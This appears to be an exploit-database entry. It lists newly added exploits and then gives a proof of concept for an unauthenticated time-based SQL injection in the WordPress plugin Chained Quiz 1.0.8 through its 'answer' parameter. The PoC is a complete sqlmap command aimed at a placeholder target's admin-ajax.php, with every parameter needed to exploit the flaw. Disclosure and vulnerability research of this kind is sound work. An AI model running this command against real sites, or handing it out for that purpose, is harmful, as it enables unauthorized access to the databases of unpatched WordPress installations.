948806b29c
11 changes to exploits/shellcodes SEIG Modbus 3.4 - Denial of Service (PoC) Zortam MP3 Media Studio 23.95 - Denial of Service (PoC) Restorator 1793 - Denial of Service (PoC) Prime95 29.4b7 - Denial Of Service (PoC) SEIG SCADA System 9 - Remote Code Execution SEIG Modbus 3.4 - Remote Code Execution Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Countly - Persistent Cross-Site Scripting
21 lines
No EOL
969 B
Text
21 lines
No EOL
969 B
Text
# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
|
|
# Exploit Author: Çlirim Emini
|
|
# Website: https://www.sentry.co.com
|
|
# Software Link: https://wordpress.org/plugins/chained-quiz/
|
|
# Version/s: 1.0.8 and below
|
|
# Patched Version: 1.0.9
|
|
# CVE : N/A
|
|
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112
|
|
|
|
# Vulnerability Description:
|
|
# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated
|
|
# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.
|
|
|
|
# Technical details:
|
|
# Chained Quiz appears to be vulnerable to time-based SQL-Injection.
|
|
# The issue lies on the $answer backend variable.
|
|
# Privileges required: None
|
|
|
|
# Proof of Concept (PoC):
|
|
|
|
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T |